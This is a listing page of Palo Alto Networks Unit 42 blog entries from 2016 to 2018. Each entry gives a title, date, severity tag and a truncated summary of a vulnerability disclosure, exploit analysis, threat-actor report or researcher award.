Four Unit 42 Vulnerability Researchers Make MSRC Top 100 for 2018
blogs_unit42·2018-08-16·CVSS 6.5
[MEDIUM] Four Unit 42 Vulnerability Researchers Make MSRC Top 100 for 2018
## Four Unit 42 Vulnerability Researchers Make MSRC Top 100 for 2018
Unit 42
Published: August 16, 2018
Threat Research
Vulnerabilities
Black Hat
Bounty Program Top 100
Microsoft
Microsoft Security Response Center (MSRC)
Palo Alto Networks Unit 42 is proud to announce that four of our researchers were named to the Microsoft Security Response Center (MSRC) “Top 100 Security Researchers List” for 2018. This is the third year Unit 42 researchers have been included in this prestigious list, which is announced every year at Black Hat. This year’s Unit 42 winners are:
Rank
Name
10
Gal De Leon
13
Hui Gao
73
Tao Yan
79
Jin Chen
Palo Alto Networks is a regular contributor to vulnerability research in Microsoft, Adobe, Apple, Android and other ecosystems. By proactively identify
Unit42
Threat Brief: Cyber Attackers Using Your Home Router To Bring Down Websites
blogs_unit42·2018-08-14
Threat Brief: Cyber Attackers Using Your Home Router To Bring Down Websites
## Threat Brief: Cyber Attackers Using Your Home Router To Bring Down Websites
Unit 42
Published: August 14, 2018
High Profile Threats
Threat Research
Vulnerabilities
Botnets
DDoS
IoT
Routers
In recent research , Palo Alto Networks found attackers were targeting home routers to take control and use them for attacks against other websites that can bring them down. Here we explain this type of attack and what you should do.
Why should I care, what can it do to me?
These attacks could affect you in two ways:
They can slow down or disrupt your internet connection,
They can also make you an unwitting participant in attacks against other websites.
What causes this kind of attack?
Weak passwords and out-of-date software can both enable attackers to take complete control of your hom
Unit42
The Gorgon Group: Slithering Between Nation State and Cybercrime
blogs_unit42·2018-08-02·CVSS 7.8
CVE-2017-0199 [HIGH] The Gorgon Group: Slithering Between Nation State and Cybercrime
Threat Research Center
Threat Actor Groups
Vulnerabilities
## The Gorgon Group: Slithering Between Nation State and Cybercrime
Robert Falcone
David Fuertes
Josh Grunzweig
Kyle Wilhoit
Published: August 2, 2018
Malware
Threat Actor Groups
Threat Research
Vulnerabilities
CVE-2017-0199
Gorgon Group
Subaat
Unit 42 researchers have been tracking Subaat , an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tu
Unit42
Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
blogs_unit42·2018-07-16·CVSS 7.5
CVE-2018-1111 [HIGH] Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
## Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
Jin Chen
Published: July 16, 2018
Threat Research
Vulnerabilities
CVE-2018-1111
In May 2018, a command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in multiple versions of Red Hat Enterprise Linux ( CVE-2018-1111 ), which has since been patched. An attacker could attack this vulnerability either through the use of a malicious DHCP server, or malicious, spoofed DHCP responses on the local network. A successful attack could execute arbitrary commands with root privileges on systems using NetworkManager with DHCP configured.
This vulnerability poses a serious threat to individuals or organizations running vulnerable instance of Red Hat Enterprise
Unit42
Unit 42 Vulnerability Research July 2018 Disclosures – Adobe
blogs_unit42·2018-07-11·CVSS 9.8
[CRITICAL] Unit 42 Vulnerability Research July 2018 Disclosures – Adobe
## Unit 42 Vulnerability Research July 2018 Disclosures – Adobe
Unit 42
Published: July 11, 2018
Threat Research
Vulnerabilities
Adobe
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered eight vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their July 2018 security update release .
CVE
Vulnerability Name
Maximum Severity Rating
Impact
Researcher(s)
CVE-2018-5009
Use-after-free
Critical
Arbitrary Code Execution
Gal De Leon
CVE-2018-5021
Out-of-bounds write
Critical
Arbitrary Code Execution
Bo Qu
CVE-2018-5022
Out-of-bounds read
Important
Information Disclosure
Bo Qu
CVE-2018-5023
Out-of-bounds read
Important
Information Disclosure
Zhangl
Unit42
The Old and New: Current Trends in Web-based Threats
blogs_unit42·2018-06-20·CVSS 9.3
CVE-2014-6332 [CRITICAL] The Old and New: Current Trends in Web-based Threats
Threat Research Center
Trend Reports
Vulnerabilities
## The Old and New: Current Trends in Web-based Threats
Tao Yan
Bo Qu
Zhanglin He
Rongbo Shao
Published: June 20, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2014-6332
CVE-2016-0189
EK
Exploit kit
KaiXin
Rig
Sundown
Summary
In this blog, Unit 42 is sharing analysis and statistics from our Email Link Analysis (ELINK) from the first quarter of 2018 and highlighting interesting findings of current web threats. We will first describe statistical information about CVEs, malicious URLs and Exploit Kits (EKs), then discuss the current life cycle of these web-based threats, and wrap up with two case studies about evolving EKs and a cryptocurrency miner.
Statistics analysis
CVEs
In the first quarter of 2018, we found 1
Unit42
Unit 42 Vulnerability Research May 2018 Disclosures – Adobe
blogs_unit42·2018-05-16·CVSS 9.8
[CRITICAL] Unit 42 Vulnerability Research May 2018 Disclosures – Adobe
## Unit 42 Vulnerability Research May 2018 Disclosures – Adobe
Unit 42
Published: May 16, 2018
Threat Research
Vulnerabilities
Acrobat
Adobe
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered a vulnerability addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their May 2018 security update release .
CVE
Vulnerability Name
Affected Products
Maximum Severity Rating
Impact
Researcher(s)
CVE-2018-4959
Use-after-free
Adobe Acrobat and Reader
Critical
Arbitrary Code Execution
Gal De Leon
CVE-2018-4961
Use-after-free
Adobe Acrobat and Reader
Critical
Arbitrary Code Execution
Gal De Leon
CVE-2018-4958
Use-after-free
Adobe Acrobat and Reader
Critical
Arbitrary Code
Unit42
Exploit in the Wild: #drupalgeddon2 - Analysis of CVE-2018-7600
blogs_unit42·2018-05-01·CVSS 9.8
CVE-2018-7600 [CRITICAL] Exploit in the Wild: #drupalgeddon2 - Analysis of CVE-2018-7600
## Exploit in the Wild: #drupalgeddon2 - Analysis of CVE-2018-7600
Yanhui Jia
Matthew Tennis
Yi Ren
Rongbo Shao
Published: May 1, 2018
Threat Research
Vulnerabilities
Attacks
CVE-2018-7600
Drupalgeddon2
Exploits
About CVE-2018-7600
On 28 March 2018, the Drupal core security team released security advisory SA-CORE-2018-002 which discusses a highly critical vulnerability CVE-2018-7600 , later nicknamed drupalgeddon2. The vulnerability is present on all Drupal versions 7.x before 7.58 , 8.3.x versions before 8.3.9 , 8.4.x versions before 8.4.6 , and 8.5.x before 8.5.1 .
The vulnerability is estimated to impact over one million Drupal users and websites. The vulnerability can enable remote code execution and results from insufficient input validation on the Drupal 7 Form API. Atta
Unit42
It’s Back! Don’t Panic, the Unit 42 Podcast, Returns with New Episodes
blogs_unit42·2018-02-22·CVSS 6.5
CVE-2018-4900 [MEDIUM] It’s Back! Don’t Panic, the Unit 42 Podcast, Returns with New Episodes
## It’s Back! Don’t Panic, the Unit 42 Podcast, Returns with New Episodes
Unit 42
Published: February 22, 2018
Threat Research
Vulnerabilities
Acrobat
Adobe
CVE-2018-4900
It’s time to “Don’t Panic” again!
Palo Alto Networks CSO Rick Howard and Palo Alto Networks Senior Director, Threat Intelligence Ryan Olson are back in the saddle with an all-new season of “Don’t Panic,” the official podcast of Unit 42, the Palo Alto Network threat intelligence team.
The first three episodes of the new season are posted and available for streaming via our Soundcloud page . In the next few weeks they will be available by additional streaming and downloading sources, too.
Give them a listen here:
You can find this episode and other Palo Alto Networks podcasts on iTunes , Google Play , or integr
Unit42
Unit 42 Vulnerability Research February 2018 Disclosures - Adobe
blogs_unit42·2018-02-13·CVSS 7.8
CVE-2018-4878 [HIGH] Unit 42 Vulnerability Research February 2018 Disclosures - Adobe
## Unit 42 Vulnerability Research February 2018 Disclosures - Adobe
Unit 42
Published: February 13, 2018
Malware
Threat Research
Vulnerabilities
Adobe
CVE-2018-4878
DogCall
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered a vulnerability addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their February 2018 security update release .
CVE
Vulnerability Name
Affected Products
Maximum Severity Rating
Impact
Researcher(s)
CVE-2018-4900
Out-of-bounds read
Adobe Acrobat
Important
Remote Code Execution
Gal De Leon
Palo Alto Networks customers who deploy our Next-Generation Security Platform are protected from zero-day vulnerabilities such as these. Weaponized exploits
Unit42
Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
blogs_unit42·2018-01-19·CVSS 7.8
CVE-2018-0802 [HIGH] Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
Threat Research Center
Threat Research
Vulnerabilities
## Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
Gal De Leon
Maor Dokhanian
Published: January 19, 2018
Malware
Threat Research
Vulnerabilities
CVE-2018-0802
Equation Editor
Microsoft
Last November, Microsoft manually patched a remotely exploitable vulnerability (CVE-2017-11882) in Equation Editor, which is a program that lets you write a mathematical equation into a document. Our Unit 42 research team provided a detailed analysis on this vulnerability here .
Since then, Microsoft has received additional reports from multiple security vendors that turned out to be related to another vulnerability that was successfully exploited after applying Microsoft’s update – Microsoft assigned it as CVE-2018
Unit42
IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
blogs_unit42·2018-01-11·CVSS 9.8
CVE-2014-8361 [CRITICAL] IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
Cong Zheng
Claud Xiao
Yanhui Jia
Published: January 11, 2018
Malware
Threat Research
Vulnerabilities
Botnet
IoT
Mirai
Satori
Zero-day
Summary
In early December 2017, 360 Netlab discovered a new malware family which they named Satori . Satori is a derivative of Mirai and exploits two vulnerabilities: CVE-2014-8361 a code execution vulnerability in the miniigd SOAP service in Realtek SDK, and CVE 2017-17215 a newly discovered vulnerability in Huawei’s HG532e home gateway patched in early December 2017.
Palo Alto Networks Unit 42 investigated Satori, and from our intelligence data, we have found there are three Satori variants. The
Unit42
Unit 42 Vulnerability Research January 2018 Disclosures - Microsoft
blogs_unit42·2018-01-09·CVSS 7.5
[HIGH] Unit 42 Vulnerability Research January 2018 Disclosures - Microsoft
## Unit 42 Vulnerability Research January 2018 Disclosures - Microsoft
Unit 42
Published: January 9, 2018
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered one vulnerability addressed by the Microsoft Security Response Center (MSRC) as part of their January 2018 security update release.
CVE
Vulnerability Name
Affected Products
Maximum Severity Rating
Impact
Researcher(s)
CVE-2018-0762
Scripting Engine Memory Corruption Vulnerability
Internet Explorer 9, 10, 11, Microsoft Edge
Critical
Remote Code Execution
Tao Yan
Palo Alto Networks customers who deploy our Next-Generation Security Platform are protected from zero-day vulnerabilities s
Unit42
Threat Brief: Meltdown and Spectre Vulnerabilities
blogs_unit42·2018-01-04
Threat Brief: Meltdown and Spectre Vulnerabilities
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Meltdown and Spectre Vulnerabilities
Unit 42
Published: January 4, 2018
High Profile Threats
Vulnerabilities
AMD
Android
ARM
Intel
Linux
MacOS
Microsoft Windows
Bottom line up front:
The Meltdown and Spectre vulnerabilities are serious vulnerabilities
These vulnerabilities are uniquely broad in scope potentially affecting nearly every computer and device with a modern processor: Microsoft Windows, Google Android, Google ChromeOS, Apple macOS, on Intel and ARM processors.
These are not code execution vulnerabilities (i.e. wormable): they are information disclosure vulnerabilities
These vulnerabilities pose greatest risk in shared hosting scenarios (i.e. cloud)
The risk these vulnerabilities po
Unit42
Palo Alto Networks Unit 42 Vulnerability Research December 2017 Disclosures - Microsoft
blogs_unit42·2017-12-19·CVSS 7.5
[HIGH] Palo Alto Networks Unit 42 Vulnerability Research December 2017 Disclosures - Microsoft
## Palo Alto Networks Unit 42 Vulnerability Research December 2017 Disclosures - Microsoft
Unit 42
Published: December 19, 2017
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered one vulnerability addressed by the Microsoft Security Response Center (MSRC) as part of their December 2017 security update release.
CVE
Vulnerability Name
Affected Products
Maximum Severity Rating
Impact
Researcher(s)
CVE-2017-11886
Scripting Engine Memory Corruption Vulnerability
Internet Explorer 9, 10, 11
Critical
Remote Code Execution
Hui Gao
Palo Alto Networks customers who deploy our Next-Generation Security Platform are protected from zero-day vulnerabi
Unit42
Analysis of CVE-2017-11882 Exploit in the Wild
blogs_unit42·2017-12-08·CVSS 7.8
CVE-2017-11882 [HIGH] Analysis of CVE-2017-11882 Exploit in the Wild
Threat Research Center
Threat Research
Vulnerabilities
## Analysis of CVE-2017-11882 Exploit in the Wild
Yanhui Jia
Published: December 8, 2017
Threat Research
Vulnerabilities
Equation Editor
Microsoft
Recently, Palo Alto Networks Unit 42 vulnerability researchers captured multiple instances of traffic in the wild exploiting CVE-2017-11882 , patched by Microsoft on November 14, 2017 as part of the monthly security update process. Exploits for this vulnerability have been released for Metasploit, and multiple security researchers have published articles on specific attacks taking advantage of this vulnerability. In this article, we describe the vulnerability and discuss mechanisms for exploiting it.
About CVE-2017-11882:
Microsoft Equation Editor, which is a Microsoft Office co
Unit42
Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures - Adobe
blogs_unit42·2017-12-06·CVSS 8.8
[HIGH] Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures - Adobe
## Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures - Adobe
Unit 42
Published: December 6, 2017
Threat Research
Vulnerabilities
Acrobat
Adobe
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered seven vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their November 2017 security update release.
CVE
Vulnerability Name
Affected Products
Maximum Severity Rating
Impact
Researcher(s)
CVE-2017-16388
Use after free
Adobe Acrobat
Critical
Remote Code Execution
Gal De Leon
CVE-2017-16389
Use after free
Adobe Acrobat
Critical
Remote Code Execution
Gal De Leon
CVE-2017-16390
Use after free
Adobe Acrobat
Critical
Remote Code
Unit42
Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures
blogs_unit42·2017-11-22·CVSS 3.1
[LOW] Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures
## Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures
Unit 42
Published: November 22, 2017
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Response Center (MSRC)
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered four vulnerabilities addressed by the Microsoft Security Response Center as part of their November 2017 security update release.
CVE
Vulnerability Name
Affected Products
Maximum Severity Rating
Impact
Researcher(s)
CVE-2017-11855
Internet Explorer Memory Corruption Vulnerability
Internet Explorer 9, 10, 11
Critical
Remote Code Execution (RCE)
Hui Gao
CVE-2017-11856
Internet Explorer Memory Corruption Vulnerability
Internet Explo
Unit42
Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
blogs_unit42·2017-10-27·CVSS 8.8
CVE-2012-0158 [HIGH] Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
## Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
Unit 42
Published: October 27, 2017
Malware
Threat Research
Vulnerabilities
CVE-2012-0158
Downloader
Phishing
QuasarRAT
Subaat
In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization. While tracking the activities of this campaign, we identified a repository of additional malware, including a web server that was used to host the payloads used for both this attack as well as others. We’ll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.
The Initial Attack
Beginning on July 16, 2017, Unit 42 observed a small wave of phishing emails targeting a US-based government organization. W
Unit42
Palo Alto Networks Unit 42 Vulnerability Research September and October 2017 Disclosures
blogs_unit42·2017-10-11·CVSS 7.5
[HIGH] Palo Alto Networks Unit 42 Vulnerability Research September and October 2017 Disclosures
## Palo Alto Networks Unit 42 Vulnerability Research September and October 2017 Disclosures
Unit 42
Published: October 11, 2017
Threat Research
Vulnerabilities
Internet Explorer
Microsoft Excel
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered vulnerabilities that have been addressed by Microsoft in their September and October security update releases.
CVE
Vulnerability Name
Affected Products
Researcher
CVE-2017-8567
Microsoft Office Remote Code Execution
Microsoft Excel for Mac 2011
Jin Chen
CVE-2017-8749
Internet Explorer Memory Corruption Vulnerability
Internet Explorer 10, Internet Explorer 11
Hui Gao
CVE-2017-11793
Scripting Engine Memory Corruption Vulnerability
Internet Explorer 9, Int
Unit42
2 Minute Threat Brief: Android Toast Overlay Attack
blogs_unit42·2017-09-14
2 Minute Threat Brief: Android Toast Overlay Attack
## 2 Minute Threat Brief: Android Toast Overlay Attack
Eila Shargh
Published: September 14, 2017
High Profile Threats
Vulnerabilities
Android
Android Toast
Unit 42 released details about a vulnerability that affects Android devices running operating systems older than 8.0 Oreo. The vulnerability leaves Android users at risk of falling victim to an Android Toast Overlay attack. Patches are available that fix this vulnerability, so Android users should get the latest updates as soon as possible.
How it Works
The vulnerability affects the Toast feature on Android devices, an Android feature that allows display messages and notifications of other applications to “pop up,” and allows an attacker to employ an overlay attack.
An overlay attack happens when an attacker places a window o
Unit42
Palo Alto Networks Discovers New QEMU Vulnerability
blogs_unit42·2017-09-14·CVSS 6.5
CVE-2017-12809 [MEDIUM] Palo Alto Networks Discovers New QEMU Vulnerability
## Palo Alto Networks Discovers New QEMU Vulnerability
Ryan Salsamendi
Published: September 14, 2017
Threat Research
Vulnerabilities
QEMU
Palo Alto Networks Unit 42 recently discovered CVE-2017-12809 , which is a vulnerability affecting QEMU beginning with version 2.8. We reported this vulnerability and it has been fixed in QEMU version 2.10.0 released on August 30, 2017. The latest version can be obtained from QEMU here .
The vulnerability results from a flaw in the way QEMU’s emulated hard drive controller handles the ATA_CACHE_FLUSH command. The QEMU host process will dereference a NULL pointer if ATA_CACHE_FLUSH is issued to a removable drive with no disk present (the default configuration). This causes the host OS to terminate QEMU. In Windows, this can be triggered from user
Unit42
Threat Brief: Patch Today and Don’t Get Burned by an Android Toast Overlay
blogs_unit42·2017-09-07
Threat Brief: Patch Today and Don’t Get Burned by an Android Toast Overlay
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Patch Today and Don’t Get Burned by an Android Toast Overlay
Unit 42
Published: September 7, 2017
High Profile Threats
Vulnerabilities
Android
Cloak and Dagger
Toast Overlay Attack
Today, Palo Alto Networks Unit 42 researchers are announcing details on a new high- severity vulnerability affecting the Google Android platform. Patches for this vulnerability are available as part of the September 2017 Android Security Bulletin . This new vulnerability does NOT affect Android 8.0 Oreo , the latest version; but it does affect all prior versions of Android. There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against thi
Unit42
Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions
blogs_unit42·2017-09-07
Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions
## Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions
Cong Zheng
Wenjun Hu
Xiao Zhang
Zhi Xu
Published: September 7, 2017
Ransomware
Threat Research
Vulnerabilities
Android
Cloak and Dagger
Palo Alto Networks Unit 42 researchers have uncovered a high severity vulnerability in the Android overlay system, which allows a new Android overlay attack by using the “Toast type” overlay. All Android devices with OS version < 8.0 are affected by this vulnerability and patches are available as part of the September 2017 Android Security Bulletin . Android 8.0 was just released and is unaffected by this vulnerability. Because Android 8.0 is recent, this vulnerability affects nearly all Android devices currently in the market ( see Table 1 ) and users should apply updates
Unit42
Palo Alto Networks Unit 42 Vulnerability Research August 2017 Disclosures
blogs_unit42·2017-08-18·CVSS 7.5
CVE-2017-8651 [HIGH] Palo Alto Networks Unit 42 Vulnerability Research August 2017 Disclosures
## Palo Alto Networks Unit 42 Vulnerability Research August 2017 Disclosures
Unit 42
Published: August 18, 2017
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered one remote code execution vulnerabilities affecting Microsoft Internet Explorer 9 and 10 that were addressed in Microsoft’s August 2017 monthly security update release:
CVE-2017-8651 : Hui Gao
Traps, Palo Alto Networks advanced endpoint solution, can block memory corruption based exploits of this nature.
Palo Alto Networks is a regular contributor to vulnerability research in Microsoft, Adobe, Apple, Google Android and other ecosystems. By proactively identifying these vulnerabilities,
Unit42
Microsoft Honors 5 Unit 42 Researchers for Vulnerability Research
blogs_unit42·2017-08-07·CVSS 6.5
[MEDIUM] Microsoft Honors 5 Unit 42 Researchers for Vulnerability Research
## Microsoft Honors 5 Unit 42 Researchers for Vulnerability Research
Samantha Pierre
Published: August 7, 2017
Threat Research
Vulnerabilities
Black Hat
Bounty Program Top 100
Microsoft
Microsoft Security Response Center (MSRC)
Every year at Black Hat, Microsoft publishes the Microsoft Security Response Center (MSRC) Bounty Program Top 100, a list of the top contributors to the company’s vulnerabilities disclosure program. This year, five Palo Alto Networks threat intelligence researchers were recognized at Black Hat USA 2017 for their contributions to preventing security incidents and advancing Microsoft product security. Congratulations to Bo Qu, Tao Yan, Hui Gao, Tongbo Luo, and Jin Chen!
Palo Alto Networks is a regular contributor to vulnerability research in Microsoft, Adob
Unit42
Palo Alto Networks Unit 42 Vulnerability Research May 2017 Disclosures
blogs_unit42·2017-06-01·CVSS 7.8
CVE-2017-0264 [HIGH] Palo Alto Networks Unit 42 Vulnerability Research May 2017 Disclosures
## Palo Alto Networks Unit 42 Vulnerability Research May 2017 Disclosures
Unit 42
Published: June 1, 2017
Threat Research
Vulnerabilities
Adobe Flash
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered two code execution vulnerabilities affecting Microsoft Office that were addressed in Microsoft’s May 2017 monthly security update release:
CVE-2017-0264 : Jin Chen
CVE-2017-0265 : Jin Chen
For current customers with a Threat Prevention subscription, Palo Alto Networks has also released IPS signatures providing proactive protection from these vulnerabilities. Traps, Palo Alto Networks advanced endpoint solution, can block memory corruption based exploits of this nature.
Palo Alto Networks is a regular contrib
Unit42
A Dissection of the “EsteemAudit” Windows Remote Desktop Exploit
blogs_unit42·2017-05-31·CVSS 8.1
CVE-2017-9073 [HIGH] A Dissection of the “EsteemAudit” Windows Remote Desktop Exploit
## A Dissection of the “EsteemAudit” Windows Remote Desktop Exploit
Tao Yan
Published: May 31, 2017
Threat Research
Vulnerabilities
CVE-2017-9073
EsteemAudit
ETERNALBLUE
## Summary
In April, a group known as the “Shadow Brokers” released a cache of stolen information that included multiple tools to exploit vulnerabilities in various versions of Microsoft Windows. The most famous of these is an exploit tool called “ EternalBlue ” which was repurposed to spread the WanaCrypt0r ransomware/worm earlier this month. Another tool released in this dump is “EsteemAudit”, which exploits CVE-2017-9073, a vulnerability in the Windows Remote Desktop system on Windows XP and Windows Server 2003. Both versions of this operating system are no longer supported by Microsoft (XP ended in 2014, Se
Unit42
Palo Alto Networks Unit 42 Vulnerability Research March 2017 Disclosures
blogs_unit42·2017-03-16·CVSS 8.8
CVE-2017-2997 [HIGH] Palo Alto Networks Unit 42 Vulnerability Research March 2017 Disclosures
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Unit 42 Vulnerability Research March 2017 Disclosures
Unit 42
Published: March 16, 2017
Threat Research
Vulnerabilities
Adobe Flash
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered three code execution vulnerabilities affecting Adobe Flash ( APSB17-07 ) that were addressed in Adobe’s monthly security update release:
CVE-2017-2997 : Tao Yan
CVE-2017-2998 : Tao Yan
CVE-2017-2999 : Tao Yan
For current customers with a Threat Prevention subscription, Palo Alto Networks has also released IPS signatures providing proactive protection from these vulnerabilities. Traps, Palo Alto Networks advanced endpoint solution, can block memor
Unit42
Palo Alto Networks Unit 42 Vulnerability Research February 2017 Disclosures
blogs_unit42·2017-03-03·CVSS 8.8
CVE-2017-2982 [HIGH] Palo Alto Networks Unit 42 Vulnerability Research February 2017 Disclosures
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Unit 42 Vulnerability Research February 2017 Disclosures
Unit 42
Published: March 3, 2017
Threat Research
Vulnerabilities
Adobe Flash
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered two code execution vulnerabilities affecting Adobe Flash ( APSB17-04 ) that were addressed in Adobe’s monthly security update release:
CVE-2017-2982: Tao Yan
CVE-2017-2996: Tao Yan
For current customers with a Threat Prevention subscription, Palo Alto Networks has also released IPS signatures providing proactive protection from these vulnerabilities. Traps, Palo Alto Networks advanced endpoint solution, can block memory corruption based exploits
Unit42
Palo Alto Networks Unit 42 Vulnerability Research December 2016 Disclosures
blogs_unit42·2016-12-16·CVSS 7.8
[HIGH] Palo Alto Networks Unit 42 Vulnerability Research December 2016 Disclosures
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Unit 42 Vulnerability Research December 2016 Disclosures
Unit 42
Published: December 16, 2016
Threat Research
Vulnerabilities
Adobe Flash
ICloud
ITunes
Microsoft Office
Safari
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have reported six vulnerabilities that have been fixed by Apple, Adobe and Microsoft.
This includes two vulnerabilities in Apple WebKit and impacts iCloud for Windows , Safari , iTunes for Windows , tvOS and iOS .
CVE-2016-7639: Tongbo Luo
CVE-2016-7642: Tongbo Luo
This includes three code execution vulnerabilities affecting Adobe Flash (APSB16-39) .
CVE-2016-7873: Tao Yan
CVE-2016-7874: Tao Yan
CVE-2016-7871: T
Unit42
Palo Alto Networks Researcher Discovers Four Critical Vulnerabilities in Adobe Flash Player
blogs_unit42·2016-10-20·CVSS 8.8
CVE-2016-6982 [HIGH] Palo Alto Networks Researcher Discovers Four Critical Vulnerabilities in Adobe Flash Player
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Four Critical Vulnerabilities in Adobe Flash Player
Ryan Olson
Published: October 20, 2016
Threat Research
Vulnerabilities
Adobe
Adobe Flash Player
Palo Alto Networks was recently credited with the discovery of four new vulnerabilities affecting Adobe Flash Player.
Researcher Tao Yan discovered critical vulnerabilities CVE-2016-6982, CVE-2016-6983, CVE-2016-6984, CVE-2016-6985 affecting Adobe Flash Player. Descriptions of each, as well as details on affected versions and products, are included in the Adobe Security Bulletin . Adobe has released security updates for Adobe Flash Player.
For current customers with a Threat Prevention subscription, Palo Alto Networks has also release
Unit42
Palo Alto Networks Discovers Two Adobe Reader Privileged JavaScript Zero-Days
blogs_unit42·2016-10-17·CVSS 9.8
CVE-2016-6957 [CRITICAL] Palo Alto Networks Discovers Two Adobe Reader Privileged JavaScript Zero-Days
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Discovers Two Adobe Reader Privileged JavaScript Zero-Days
Gal De Leon
Published: October 17, 2016
Threat Research
Vulnerabilities
Adobe
Adobe Reader
We recently discovered two zero-day vulnerabilities in Adobe Reader. Adobe has since released a patch (on October 6, 2016) to fix these vulnerabilities, which are named CVE-2016-6957 and CVE-2016-6958. These vulnerabilities could allow an attacker to compromise Adobe Reader by bypassing restrictions on JavaScript API execution (CVE-2016-6957) and security provisions that prevent arbitrary execution of scripts such as those written in Python (CVE-2016-6957). In this blog post, I will provide a technical walkthrough of these vulnerabilities, how they can be
Unit42
Palo Alto Networks Researcher Discovers Eight Critical Vulnerabilities in Adobe Flash Player
blogs_unit42·2016-09-19·CVSS 8.8
CVE-2016-4182 [HIGH] Palo Alto Networks Researcher Discovers Eight Critical Vulnerabilities in Adobe Flash Player
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Eight Critical Vulnerabilities in Adobe Flash Player
Ryan Olson
Published: September 19, 2016
Threat Research
Vulnerabilities
Adobe
Adobe Flash
Palo Alto Networks was recently credited with the discovery of eight new vulnerabilities affecting Adobe Flash Player.
Researcher Tao Yan discovered critical vulnerabilities CVE-2016-4182, CVE-2016-4237, CVE-2016-4238, CVE-2016-4281, CVE-2016-4282, CVE-2016-4283, CVE-2016-4284, and CVE-2016-4285 affecting Adobe Flash Player. Descriptions of each, as well as details on affected versions and products, are included in the following Adobe Security Bulletins:
Adobe Security Bulletin – August 26, 2016
Adobe Security Bulletin – September 13, 20
Unit42
Unit 42 Researchers Recognized in MSRC Top 100 List
blogs_unit42·2016-08-16·CVSS 6.5
[MEDIUM] Unit 42 Researchers Recognized in MSRC Top 100 List
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Researchers Recognized in MSRC Top 100 List
Ryan Olson
Published: August 16, 2016
Threat Research
Vulnerabilities
Black Hat
Bounty Program Top 100
Microsoft
Microsoft Security Response Center (MSRC)
Four Palo Alto Networks threat intelligence researchers were recently recognized in the Microsoft Security Response Center (MSRC) Bounty Program Top 100 list announced at Black Hat USA 2016. Congratulations to Bo Qu, Tao Yan, Hui Gao, and Tongbo Luo!
Palo Alto Networks is a regular contributor to vulnerability research in Microsoft, Apple, Android and other ecosystems. By proactively identifying vulnerabilities, developing protections for our customers, and sharing them with Microsoft for patching, we are removing
Unit42
Palo Alto Networks Researchers Discover Critical Safari 9.1 Vulnerability
blogs_unit42·2016-07-27·CVSS 8.8
CVE-2016-4589 [HIGH] Palo Alto Networks Researchers Discover Critical Safari 9.1 Vulnerability
